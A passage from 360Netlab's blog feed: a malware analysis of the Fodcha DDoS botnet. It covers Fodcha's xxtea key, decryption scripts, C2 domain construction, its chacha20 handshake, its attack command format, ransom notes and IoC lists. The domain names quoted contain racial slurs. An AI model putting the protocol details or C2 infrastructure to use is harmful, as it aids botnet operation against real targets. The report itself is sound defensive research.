DNS&#x5B89;&#x5168;SaaS&#x5E73;&#x53F0;&#x6216;&#x90E8;&#x7F72;&#x672C;&#x5730;360DNS&#x5B89;&#x5168;&#x4EA7;&#x54C1;&#xFF0C;&#x53CA;&#x65F6;&#x9632;&#x8303;&#x6B64;&#x7C7B;&#x65B0;&#x578B;&#x5A01;&#x80C1;&#xFF0C;&#x907F;&#x514D;&#x4F01;&#x4E1A;&#x8D44;&#x4EA7;&#x5931;&#x9677;&#x3002;&#x8054;&#x7CFB;&#x4EBA;: <a href="mailto:wangkun-bd@360.cn">wangkun-bd@360.cn</a></p>
<h1 id>&#x8054;&#x7CFB;&#x6211;&#x4EEC;</h1>
<p>&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x53EF;&#x4EE5;&#x5728; <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com"><strong>twitter</strong></a> &#x6216;&#x8005;&#x901A;&#x8FC7;&#x90AE;&#x4EF6;<strong>netlab[at]360.cn</strong>&#x8054;&#x7CFB;&#x6211;&#x4EEC;&#x3002;</p>
<!--kg-card-end: markdown--><p> &#xA0;</p>]]></content:encoded></item><item><title><![CDATA[Fodcha Is Coming Back, Raising A Wave of Ransom  DDoS]]></title><description><![CDATA[<h1 id="background">Background</h1>
<p>On April 13, 2022, 360Netlab first disclosed the <code>Fodcha</code> botnet. After our article was published, Fodcha suffered a crackdown from the relevant authorities, and its authors quickly responded by leaving <code>&quot;Netlab pls leave me alone I surrender&quot;</code> in an updated sample.No surprise, Fodcha&apos;s authors</p>]]></description><link>https://blog.netlab.360.com/fodcha-is-coming-back-with-rddos/</link><guid isPermaLink="false">63873b9a8b1c1e0007f53024</guid><category><![CDATA[Botnet]]></category><category><![CDATA[DDoS]]></category><category><![CDATA[Import 2022-11-30 11:16]]></category><category><![CDATA[en]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Mon, 31 Oct 2022 14:00:00 GMT</pubDate><content:encoded><![CDATA[<h1 id="background">Background</h1>
<p>On April 13, 2022, 360Netlab first disclosed the <code>Fodcha</code> botnet. After our article was published, Fodcha suffered a crackdown from the relevant authorities, and its authors quickly responded by leaving <code>&quot;Netlab pls leave me alone I surrender&quot;</code> in an updated sample.No surprise, Fodcha&apos;s authors didn&apos;t really stop updating after the fraudulent surrender, and soon a new version was released.</p>
<p>In the new version, the authors of Fodcha redesigned the communication protocol and started to use <code>xxtea</code> and <code>chacha20</code> algorithms to encrypt sensitive resources and network communications to avoid detection at the file &amp; traffic level; at the same time, a dual-C2 scheme with <code>OpenNIC domain</code> as the primary C2 and <code>ICANN domain</code> as the backup C2 was adopted.</p>
<p>Relying on the strong N-day vulnerability integration capabilities, the comeback of Focha is just as strong as the previous ones. In our data view, in terms of scale, Fodcha has once again developed into a massive botnet with more than <code>60K</code> daily active bots and <code>40+ C2 IPs</code>, we also observed it can easily launch more than 1Tbps DDos traffic; in terms of attacks, Fodcha has an average of <code>100+</code> daily attack targets and more than <code>20,000</code> cumulative attacks, on October 11, Fodcha hit its record and attacked <code>1,396</code> unique targets in that single day.</p>
<p>While Fodcha was busy attacking various targets, it has not forgot to mess with us, we saw it using <code>N3t1@bG@Y</code> in one of it scan payload.</p>
<h1 id="timeline">Timeline</h1>
<p>Backed by our <code>BotMon</code> systems, we have kept good track of Fodcha&apos;s sample evolution and DDoS attack instructions, and below are the sample evolution and some important DDoS attack events we have seen. (Note: The Fodcha sample itself does not have a specific flag to indicate its version, this is the version number we use internally for tracking purposes)</p>
<ul>
<li>
<p>On January 12, 2022, the first Fodcha botnet sample was captured.</p>
</li>
<li>
<p>April 13, 2022, Disclosure of the <a href="https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/">Fodcha</a> botnet, containing versions V1, V2.</p>
</li>
<li>
<p>April 19, 2022, captured version V2.x, using <code>OpenNIC&apos;s TLDs</code> style C2</p>
</li>
<li>
<p>April 24, 2022, version V3, using xxtea algorithm to encrypt configuration information, adding <code>ICANN&apos;s TLDs</code> style C2, adding <code>anti-sandbox</code> &amp; <code>anti-debugging</code> mechanism.</p>
</li>
<li>
<p>June 5, 2022, version V4, using structured configuration information, <code>anti-sandboxing</code> &amp; <code>anti-debugging</code> mechanism were removed.</p>
</li>
<li>
<p>July 7, 2022, version V4.x with an additional set of <code>ICANN C2</code>.</p>
</li>
<li>
<p>On September 21, 2022, a well-known cloud service provider was attacked with traffic exceeding <code>1Tbps</code>.</p>
</li>
</ul>
<h1 id="botnet-size">Botnet Size</h1>
<p>In April, we confirmed that the number of Fodcha&apos;s global daily live bots was about <code>60,000</code> <a href="https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/">(refer to our other article)</a>. We don&#x2019;t have accurate number of the current size, but suspect that the number of current active bots has not dropped, maybe more than <code>60,000</code> now.</p>
<p>There is a positive relationship between the size of a botnet and the number of C2 IPs, and the most parsimonious view is that &quot;the larger the botnet, the more C2 infrastructure it requires. In April, there were <code>10 c2s</code> to control the <code>60,000</code> bots; After that, we observed that the IPs corresponding to its C2 domains continued to increase. Using a simple dig command to query the latest C2 domain name <code>yellowchinks.dyn</code>, we can see it resolves to <code>44 IPs</code>.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_c2infras.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_c2infras.png" class="kg-image"></a></p>
<p>One likely reason for this is that their botnet is so large that they need to invest more IP resources in order to have a reasonable ratio between Bots and C2s to achieve load balancing.</p>
<h1 id="ddos-statistics">DDoS Statistics</h1>
<p>More C2 IPs cost more money, and it seems that the business is good as it has been very active launching ddos attacks.We have excerpted the data from June 29, 2022 to the present, and the attack trends and target area distribution are as follows.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/image--1-.png"><img src="https://blog.netlab.360.com/content/images/2022/10/image.min-1.png" class="kg-image"></a></p>
<p>We can see that the ddos attacks has been non-stop, and China and US have the most targets.</p>
<p>The time distribution of the attack instructions within 7 days is shown below, which shows that Fodcha launched DDoS attacks throughout 7 * 24 hours, without any obvious working time zone.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_instimezone.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_instimezone.png" class="kg-image"></a></p>
<h1 id="sample-analysis">Sample Analysis</h1>
<p>We have divided the captured samples into four major versions, of which V1and <code>V2</code> have been analyzed in the previous blog, here we select the latest <code>V4</code> series samples as the main object of analysis, their basic information is shown below.</p>
<pre><code>MD5: ea7945724837f019507fd613ba3e1da9
ELF 32-bit LSB executable, ARM, version 1, dynamically linked (uses shared libs), stripped
LIB: uclibc
PACKER: None
version: V4

MD5: 899047ddf6f62f07150837aef0c1ebfb
ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, stripped
Lib: uclibc
Packer: None
Version: V4.X
</code></pre>
<p>When Fodcha&apos;s Bot executes, it will first check <code>the operating parameters</code>, <code>network connectivity</code>, <code>whether the &quot;LD_PRELOAD&quot; environment variable is set</code>, and <code>whether it is debugged</code>. These checks can be seen as a simple countermeasure to the typical emulator &amp; sandbox.</p>
<p>When the requirements are met, it first decrypts the configuration information and print &#x201C;snow slide&#x201D; on the Console, then there are some common host behaviors, such as single instance, process name masquerading, manipulating watchdog, terminating specific port processes, reporting specific process information, etc. The following will focus on the decryption of configuration information, network communication, DDoS attacks and other aspects of Fodcha.</p>
<h2 id="decrypting-configuration-information-config">Decrypting configuration information (Config)</h2>
<p>Fodcha uses a side-by-side Config organization in <code>V2.X</code> and <code>V3</code>, and a structured Config organization in <code>V4</code> and <code>V4.X</code>. The following figure clearly shows the difference.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_disconfig.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_disconfig.png" class="kg-image"></a></p>
<p>Although the organization of Config is different, their encryption methods are the same. As we can see by the constants referenced in the code snippet below, they use the xxtea algorithm with the key <code>PJbiNbbeasddDfsc</code>.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_xxtea.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_xxtea.png" class="kg-image"></a></p>
<p>After inversion, we wrote the following <code>IDAPYTHON</code> script to decrypt the configuration information.</p>
<pre><code># md5: ea7945724837f019507fd613ba3e1da9
# requirement: pip install xxtea-py
# test: ida7.6_python3

import ida_bytes
import xxtea

BufBase=0x1F2B0
ConfBase=0x0001F1A0
key=b&quot;PJbiNbbeasddDfsc&quot;
for i in range(17):
    offset=ida_bytes.get_word(i*16+ConfBase+2)
    leng=ida_bytes.get_word(i*16+ConfBase+4)-offset
    buf=ida_bytes.get_bytes(BufBase+offset,leng)
    print(&quot;index:%d, %s&quot; %(i,xxtea.decrypt(buf,key)))
</code></pre>
<p>The decrypted Config information is shown in the following table. You can see that index 11 still retains the aforementioned &quot;surrender&quot; egg, index 12 is worth mentioning, as it is the reporter server address to which Fodcha reports some process-specific information.</p>
<table>
<thead>
<tr>
<th>Index</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>snow slide</td>
</tr>
<tr>
<td>1</td>
<td>/proc/</td>
</tr>
<tr>
<td>2</td>
<td>/stat</td>
</tr>
<tr>
<td>3</td>
<td>/proc/self/exe</td>
</tr>
<tr>
<td>4</td>
<td>/cmdline</td>
</tr>
<tr>
<td>5</td>
<td>/maps</td>
</tr>
<tr>
<td>6</td>
<td>/exe</td>
</tr>
<tr>
<td>7</td>
<td>/lib</td>
</tr>
<tr>
<td>8</td>
<td>/usr/lib</td>
</tr>
<tr>
<td>9</td>
<td>.ri</td>
</tr>
<tr>
<td>10</td>
<td>GET /geoip/?res=10&amp;r HTTP/1.1\r\nHost: 1.1.1.1\r\nConnection: Close\r\n\r\n</td>
</tr>
<tr>
<td>11</td>
<td>Netlab pls leave me alone I surrender</td>
</tr>
<tr>
<td>12</td>
<td>kvsolutions.ru</td>
</tr>
<tr>
<td>13</td>
<td>api.opennicproject.org</td>
</tr>
<tr>
<td>14</td>
<td>watchdog</td>
</tr>
<tr>
<td>15</td>
<td>/dev/</td>
</tr>
<tr>
<td>16</td>
<td>TSource Engine Query</td>
</tr>
</tbody>
</table>
<h2 id="network-communication">Network communication</h2>
<p>Fodcha&apos;s network communication has a very fixed feature at the code level: a perpetual While loop, with switch-case processing at each stage, so that the CFG graphs generated by each version of Fodcha&apos;s network protocol processing functions are highly similar in IDA.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_cfg.png" width="860px"> 
<p>In summary, Fodcha&apos;s network communication goes through the following four steps.</p>
<ol>
<li>Decryption C2</li>
<li>DNS query</li>
<li>Establishing communication</li>
<li>Execute the command</li>
</ol>
<h3 id="0x1-decrypting-c2">0x1: Decrypting C2</h3>
<p>Different versions of Fodcha support different types of C2. V2.X has only 1 group of OpenNIC C2; V3 &amp; V4 have 1 group of OpenNIC C2 and 1 group of ICANN C2; and V4.X has the most, 1 group of OpenNIC C2 and 2 groups of ICANN C2, the following diagram shows the difference very clearly.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_c2_dis.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_c2_dis.png" class="kg-image"></a></p>
<p>Although the types &amp; numbers of C2 are different, their processing logic is almost the same as shown in the figure below.</p>
<p>Firstly, a C2 domain name is obtained through the C2_GET function, and then the corresponding IP of C2 is obtained through the DNS_QUERY function, where the first parameter of C2_GET is the C2 ciphertext data, and the second parameter is the length, while the second parameter of DNS_QUERY implies the type of C2.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/FODCHA_c2compose.png" width="860px"> 
<p>A valid C2 domain name can be obtained through C2_GET, and its internal implementation can be divided into 2 steps.</p>
<ul>
<li>First, the C2 ciphertext data must be decrypted.</li>
<li>Then they are constructed into a legitimate domain name.</li>
</ul>
<h3 id="decrypting-c2-ciphertext-data">Decrypting C2 ciphertext data</h3>
<p>The C2 ciphertext data uses the same encryption method as the configuration information, i.e. xxtea, and the key is also</p>
<p><code>PJbiNbbeasddDfsc</code>. The OpenNic C2 data can be decrypted by the following simple IDAPYTHON script.</p>
<pre><code>#md5: 899047DDF6F62F07150837AEF0C1EBFB
import xxtea
import ida_bytes
import hexdump
key=b&quot;PJbiNbbeasddDfsc&quot;
buf=ida_bytes.get_bytes(0x0001CA6C,1568)  # Ciphertext of OpenNic C2
plaintext=xxtea.decrypt(buf,key)
print(plaintext)
</code></pre>
<p>The decrypted C2 data is shown below, you can see that the C2 data consists of 2 parts, the front is the domain names, the back is the TLDs, they are separated by the &quot;<strong>/</strong>&quot; symbol in the red box.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_c2plaintext.png" width="860px"> 
<h3 id="constructing-a-domain-name">Constructing a domain name</h3>
<p>Fodcha has a specific domain name construction method, and the equivalent Python implementation is shown below.</p>
<pre><code># md5: 899047ddf6f62f07150837aef0c1ebfb
# requirement: pip install xxtea-py
# test: ida7.6_python3

import xxtea
import ida_bytes

def getcnt(length):
    cnt=1
    while True:
        cnt +=1
        calc=2
        
        for i in range(1,cnt):
            calc+=2+12*i%cnt
                    
        if calc +cnt==length-1:
            return cnt

                        
key=b&quot;PJbiNbbeasddDfsc&quot;
buf=ida_bytes.get_bytes(0x0001CA6C,1568)  # Ciphertext of OpenNic C2
plaintext=xxtea.decrypt(buf,key)

domains,tlds=plaintext.split(b&apos;/&apos;)
domainList=domains.split(b&apos;,&apos;)
tldList=tlds.split(b&apos;,&apos;)

cnt=getcnt(len(domainList))

print(&quot;------------There&apos;re %d C2------------&quot; %cnt)
coff=2
for i in range(0,cnt):
    if i ==0:
        c2Prefix=domainList[i+coff]
    else:
        coff+=12*i %cnt+2
        c2Prefix=domainList[i+coff]
    c2Tld=tldList[(cnt-i-1)*3]
    print(c2Prefix + b&apos;.&apos; + c2Tld)

</code></pre>
<p>Taking the C2 data obtained above as input, the following 14 OpenNIC C2s are finally constructed.</p>
<pre><code>techsupporthelpars.oss
yellowchinks.geek
yellowchinks.dyn
wearelegal.geek
funnyyellowpeople.libre
chinksdogeaters.dyn
blackpeeps.dyn
pepperfan.geek
chinkchink.libre
peepeepoo.libre
respectkkk.geek
bladderfull.indy
tsengtsing.libre
obamalover.pirate
</code></pre>
<p>Readers familiar with the ICANN domain name system may think at first glance that our decryption is wrong, because the ICANN domain name system does not support these TLDs, they would be &quot;unresolvable&quot;, but in fact they are the domain names under the OpenNIC system, OpenNIC is independent of the OpenNIC, which supports the TLDs shown in the figure below. The domain names of OpenNIC cannot be resolved by common DNS (such as <code>8.8.8.8</code>, <code>101.198.198.198</code>) and must use the specified NameServer. Readers can check out <a href="https://www.opennic.org/?ref=blog.netlab.360.com">OpenNIC&#x2019;s official website</a> for more details.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_opennic.png" width="860px"> 
<p>Using the same method, we can get the following 4 ICANN C2s.</p>
<pre><code>cookiemonsterboob[.]com
forwardchinks[.]com
doodleching[.]com
milfsfors3x[.]com
</code></pre>
<h3 id="0x2-dns-lookup">0X2: DNS lookup</h3>
<p>When the C2 domain name is successfully obtained, Bot performs the domain name resolution through the function <code>DNS_QUERY</code>, its 2nd parameter is a FLAG, which implies the different processing of OpenNIC/ICANN C2, and the corresponding code snippet is shown below.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_disdns.png" width="860px"> 
<p>It can be seen that there are 2 options for the resolution of OpenNIC C2.</p>
<ul>
<li>Option 1: Request from <code>api.opennicproject.org</code> through API interface to get nameserver dynamically</li>
</ul>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_resolvns.png" width="860px"> 
<ul>
<li>Option 2: Use the hard-coded nameserver shown in the figure below</li>
</ul>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_opennicHard.png" width="860px"> 
<p>For ICANN C2, there is only one option, i.e., use the hard-coded nameserver shown in the figure below.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_iccanHard.png" width="860px"> 
<p>The actual resolution of C2 <code>techsupporthelpars.oss</code>, for example, is reflected in the network traffic as follows.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_opendnsexample.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_opendnsexample.png" class="kg-image"></a></p>
<h3 id="why-use-opennic-icann-dual-c2">Why use OpenNIC / ICANN dual C2?</h3>
<p>Fodcha&apos;s author has built a redundant OpenNIC / ICANN dual-C2 architecture, why did he do so?</p>
<p>From a C2 infrastructure perspective, after Fodcha was exposed, its C2 was added to various security lists. <code>Quad9DNS (9.9.9.9)</code>, for example, had sent a tweet about Fodcha domain traffic spike</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_quad.png" width="860px"> 
<p>After Fodcha was cracked down, its author, when reselecting the C2 infrastructure, looked at the <code>DNS Neutrality</code> feature touted by OpenNIC to eliminate the possibility of C2 being regulated &amp; taken over.</p>
<p>At the same time, OpenNIC based C2 has it own problems, such as the NameServer of OpenNIC may not be accessible in some regions, or there are efficiency or stability problems in domain name resolution. For the sake of robustness, Fodcha authors re-added ICANN C2 as the backup C2 after V3 to form a redundant structure with the main C2.</p>
<h3 id="0x3-establishing-communication">0x3: Establishing communication</h3>
<p>Fodcha Bot establishes a connection to C2 through the following code snippet, which has a total of 22 ports.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_establishConn.png" width="860px"> 
<p>Once the connection with C2 is successfully established, the Bot and C2 must go through 3 phases of interaction before communication is actually established.</p>
<ul>
<li>
<p>Stage 1: Bot requests the key&amp;nonce of the chacha20 encryption algorithm from C2.</p>
</li>
<li>
<p>Stage 2: Bot and C2 use the key&amp;nonce from stage 1 for identity confirmation.</p>
</li>
<li>
<p>Stage 3: Bot sends the encrypted upline &amp; group information to C2.</p>
</li>
</ul>
<p>To aid in the analysis, we ran the Bot sample within a restricted environment and used <code>fsdsaD</code> as the packet string to generate the network traffic shown in the figure below, and the details of how this traffic was generated are described below.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_prapacket.png" width="860px"> 
<h4 id="stage-1-botc2-formatted-as-head7-bytes-body-random-20-40-bytes">Stage 1: Bot ---&gt; C2 ,formatted as head(7 bytes) + body( random 20-40 bytes)</h4>
<p>Bot actively sends an initialization message with <code>netstage=6</code> to C2, this message has the format of head+body, and the meaning of each field is shown below.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageOneb2c.png" width="860px"> 
<h4 id="head">head</h4>
<p>The length of head is 7 bytes, and the format is shown below.</p>
<pre><code>06     		----&gt;netstage,1byte,06 means init
f0 70       ----&gt;tcpip checksum, 2byte, 
00 16		----&gt;length of body, 2 bytes
</code></pre>
<h4 id="checksum">checksum</h4>
<p>checksum<br>
The checksum in head uses the tcp/ip checksum, which is calculated for the whole payload, and the original value of the checksum offset is <code>\x00\x00</code>, and the python implementation of the checksum is as follows.</p>
<pre><code class="language-python">def checksum(data):
    s = 0
    n = len(data) % 2
    for i in range(0, len(data)-n, 2):
        s+= ord(data[i]) + (ord(data[i+1]) &lt;&lt; 8)
    if n:
        s+= ord(data[-1])
    while (s &gt;&gt; 16):
        s = (s &amp; 0xFFFF) + (s &gt;&gt; 16)
        s = ~s &amp; 0xffff
    return s

buf=&quot;\x06\x00\x00\x00\x00\x00\x16\x36\x93\x93\xb7\x27\x5c\x9a\x2a\x16\x09\xd8\x13\x32\x01\xd2\x69\x1d\x25\xf3\x42\x00\x32&quot;
print(hex(checksum(buf)))

#hex(checksum(buf))
#0x70f0
</code></pre>
<h4 id="body">body</h4>
<p>body is a randomly generated content, meaningless.</p>
<pre><code>00000000  36 93 93 b7 27 5c 9a 2a 16 09 d8 13 32 01 d2 69
00000010  1d 25 f3 42 00 32
</code></pre>
<h4 id="stage-1-c2bot-2-rounds">Stage 1: C2--&gt;Bot, 2 rounds</h4>
<p>When C2 receives the message <code>netstage=6</code> from Bot, it will send 2 rounds of data to BOT.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageOne.png" width="860px"> 
<ul>
<li>
<p>The first round, 36 bytes , the original message is encrypted by xxtea and decrypted as the key of chacha20, with the length of 32bytes</p>
<pre><code class="language-python">import hexdump
import xxtea
key=b&quot;PJbiNbbeasddDfsc&quot;
keyBuf=bytes.fromhex(&quot;806d8806cd5460d8996339fbf7bac34ba1e20f792872ba0e05d096ad92a5535e60e55b8d&quot;)
chaKey=xxtea.decrypt(keyBuf,key)
hexdump.hexdump(chaKey)

#chaKey
00000000: E6 7B 1A E3 A4 4B 13 7F  14 15 5E 99 31 F2 5E 3A
00000010: D7 7B AB 0A 4D 5F 00 EF  0C 01 9F 86 94 A4 9D 4B

</code></pre>
</li>
<li>
<p>Second round, 16 bytes , the original message is encrypted by xxtea, decrypted as the nonce of chacha20, length 12bytes</p>
<pre><code class="language-python">import hexdump
import xxtea
key=b&quot;PJbiNbbeasddDfsc&quot;
nonBuf=bytes.fromhex(&quot;22c803bb310c5b2512e76a472418f9ee&quot;)
chaNonce=xxtea.decrypt(nonBuf,key)
hexdump.hexdump(chaNonce)

#chaNonce
00000000: 98 79 59 57 A8 BA 7E 13  59 9F 59 6F
</code></pre>
</li>
</ul>
<h4 id="stage-2-botc2-chacha20-encryption">Stage 2: Bot---&gt;C2, chacha20 encryption</h4>
<p>Once Bot receives the key and nonce of chacha20, it sends the message <code>netstage=4</code> to C2, this time the message is encrypted using chacha20, the key&amp;nonce is obtained from the previous stage, the number of rounds encrypted is 1.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageTwob2c.png" width="860px"> 
<p>We can decrypt the above traffic using the following python code that</p>
<pre><code>from Crypto.Cipher import ChaCha20
cha=ChaCha20.new(key=chaKey,nonce=chaNonce)
cha.seek(64)
tmp=bytes.fromhex(&apos;dc23c56943431018b61262481ce5a219da9480930f08714e017edc56bf903d32ac5daeb8314f1bf7e6&apos;)
rnd3=cha.decrypt(tmp)
</code></pre>
<p>The decrypted traffic is shown below, it still has the format of head (7 bytes) + body as described before, where the value of the netstage field of head is 04, which represents the authentication.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netplainb2c.png" width="860px"> 
<h4 id="stage-2-c2bot-chacha20-encryption">Stage 2: C2 ---&gt; Bot, chacha20 encryption</h4>
<p>After receiving the authentication message from Bot, C2 also sends a message with <code>netstage=4</code> to Bot&apos;s data, also using chacha20 encryption, and the key,nonce,round number is the same as that used by Bot.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageTwoc2b.png" width="860px"> 
<p>Using the same code as Bot to decrypt the traffic, we can see that its format is also head+body, and the value of netstage is also 04.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netplainc2b.png" width="860px"> 
<p>After Bot and C2 send each other the message <code>netstage=4</code>, the chacha20 key&amp;nonce representing stage 1 is recognized by both parties, and the authentication of each other is completed, and Bot enters the next stage to prepare to go online.</p>
<h4 id="stage-3-botc2-2-rounds-chacha-encryption">Stage 3: Bot---&gt;C2, 2 rounds, chacha encryption</h4>
<p>Bot sends netstage=5 message to C2 to indicate that it is ready to go online, and then reports its own grouping information to C2, these 2 rounds of messages also use chacha20 encryption.</p>
<ul>
<li>
<p>First round<br>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageThrReg.png" width="860px"></p>
</li>
<li>
<p>Second round</p>
 <img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageThrGroup.png" width="860px"> 
</li>
</ul>
<p>After the above two rounds of data decryption, we can see that the content of the group is exactly the preset <code>fsdsaD</code>, which means our analysis is correct, so the Bot is successfully online and starts to wait for the execution of the command sent by C2.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netplainb2cReg.png" width="860px"> 
<h3 id="0x4-execute-command">0x4: Execute command</h3>
<p>Bot successfully online, support the netstage number, as shown in the figure below, the most important is the <code>netstage = 1</code> on behalf of the DDoS task, Fodcha reuse a large number of Mirai attack code, a total of <code>17</code> kinds of attack methods are supported.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_afterreg.png" width="860px"> 
<p>Take the following <code>DDos_Task</code> traffic <code>(netstage=01)</code> as an example.</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_taskddos.png" width="860px"> 
<p>The attack instructions are still encrypted using <code>chacha20</code>, and the decrypted instructions are shown below, which might ring a bell for readers who are familiar with <code>Mirai</code>.</p>
<pre><code>00000000: 00 00 00 3C 07 01 xx 14  93 01 20 02 00 00 02 01
00000010: BB 01 00 02 00 01
</code></pre>
<p>The format and parsing of the above attack instructions are shown in the following table.</p>
<table>
<thead>
<tr>
<th>offset</th>
<th>len (bytes)</th>
<th>value</th>
<th>meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00</td>
<td>4</td>
<td>00 00 00 3c</td>
<td>Duration</td>
</tr>
<tr>
<td>0x04</td>
<td>1</td>
<td>07</td>
<td>Attack Vector&#xFF0C;07</td>
</tr>
<tr>
<td>0x05</td>
<td>1</td>
<td>1</td>
<td>Attack Target Cnt</td>
</tr>
<tr>
<td>0x06</td>
<td>4</td>
<td>xx 14  93 01</td>
<td>Attack Target&#xFF0C;xx.20.147.1</td>
</tr>
<tr>
<td>0x0a</td>
<td>1</td>
<td>20</td>
<td>Netmask</td>
</tr>
<tr>
<td>0x0b</td>
<td>1</td>
<td>02</td>
<td>Option Cnt</td>
</tr>
<tr>
<td>0x0c</td>
<td>5</td>
<td>00 00 02 01 bb</td>
<td>OptionId 0&#xFF0C;len 2, value 0x01bb ---&gt; (port 443)</td>
</tr>
<tr>
<td>0x11</td>
<td>5</td>
<td>01 00 02 00 01</td>
<td>OptionId 1, len 2, value 0x0001---&gt; (payload len 1 byte)</td>
</tr>
</tbody>
</table>
<p>When Bot receives the above instruction, it will use the tcp message with a payload of 1 byte to conduct a DDoS attack on the target <code>xx.20.147.1:443</code>, which corresponds to the actual packet capture traffic.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_ddospacket.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_ddospacket.png" class="kg-image"></a></p>
<h1 id="misc">Misc</h1>
<h3 id="0x01-racism">0x01: Racism</h3>
<p>From some of the OpenNIC C2 constructs, it seems that the author of Fodcha is more hostile to people from some regions.</p>
<pre><code>yellowchinks.geek
wearelegal.geek
funnyyellowpeople.libre
chinksdogeaters.dyn
blackpeeps.dyn
bladderfull.indy

wehateyellow
</code></pre>
<h3 id="0x02-ransom-ddos">0x02: Ransom DDoS</h3>
<p>Fodcha had the following string attached to the UDP attack command it issued.</p>
<pre><code>send 10 xmr to 49UnJhpvRRxDXJHYczoUEiK3EKCQZorZWaV6HD7axKGQd5xpUQeNp7Xg9RATFpL4u8dzPfAnuMYqs2Kch1soaf5B5mdfJ1b or we will shutdown your business
</code></pre>
<p>The corresponding attack traffic is shown below, the wallet address appears to be illegal, perhaps the operators behind Fodcha are experimenting with the attack-as-ransom business model, we will see how it evolve.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_ddosransom.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_ddosransom.png" class="kg-image"></a></p>
<h1 id="contact-us">Contact us</h1>
<p>Readers are always welcomed to reach us on <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com">twitter</a> or email us to netlab[at]360.cn.</p>
<h1 id="ioc">IoC</h1>
<h3 id="c2">C2</h3>
<pre><code>v1,v2:
folded[.]in
fridgexperts[.]cc

ICANN C2:
forwardchinks[.]com
doodleching[.]com
cookiemonsterboob[.]com
milfsfors3x[.]com

OpenNIC C2:

yellowchinks.geek
yellowchinks.dyn
wearelegal.geek
tsengtsing.libre
techsupporthelpars.oss
respectkkk.geek
pepperfan.geek
peepeepoo.libre
obamalover.pirate
funnyyellowpeople.libre
chinksdogeaters.dyn
chinkchink.libre
bladderfull.indy
blackpeeps.dyn
91.206.93.243
91.149.232.129
91.149.232.128
91.149.222.133
91.149.222.132
67.207.84.82
54.37.243.73
51.89.239.122
51.89.238.199
51.89.176.228
51.89.171.33
51.161.98.214
46.17.47.212
46.17.41.79
45.88.221.143
45.61.139.116
45.41.240.145
45.147.200.168
45.140.169.122
45.135.135.33
3.70.127.241
3.65.206.229
3.122.255.225
3.121.234.237
3.0.58.143
23.183.83.171
207.154.206.0
207.154.199.110
195.211.96.142
195.133.53.157
195.133.53.148
194.87.197.3
194.53.108.94
194.53.108.159
194.195.117.167
194.156.224.102
194.147.87.242
194.147.86.22
193.233.253.93
193.233.253.220
193.203.12.157
193.203.12.156
193.203.12.155
193.203.12.154
193.203.12.151
193.203.12.123
193.124.24.42
192.46.225.170
185.45.192.96
185.45.192.227
185.45.192.212
185.45.192.124
185.45.192.103
185.198.57.95
185.198.57.105
185.183.98.205
185.183.96.7
185.143.221.129
185.143.220.75
185.141.27.238
185.141.27.234
185.117.75.45
185.117.75.34
185.117.75.119
185.117.73.52
185.117.73.147
185.117.73.115
185.117.73.109
18.185.188.32
18.136.209.2
178.62.204.81
176.97.210.176
172.105.59.204
172.105.55.131
172.104.108.53
170.187.187.99
167.114.124.77
165.227.19.36
159.65.158.148
159.223.39.133
157.230.15.82
15.204.18.232
15.204.18.203
15.204.128.25
149.56.42.246
139.99.166.217
139.99.153.49
139.99.142.215
139.162.69.4
138.68.10.149
137.74.65.164
13.229.98.186
107.181.160.173
107.181.160.172
</code></pre>
<h3 id="reporter">Reporter</h3>
<pre><code>kvsolutions[.]ru
icarlyfanss[.]com
</code></pre>
<h3 id="samples">Samples</h3>
<pre><code>ea7945724837f019507fd613ba3e1da9
899047ddf6f62f07150837aef0c1ebfb
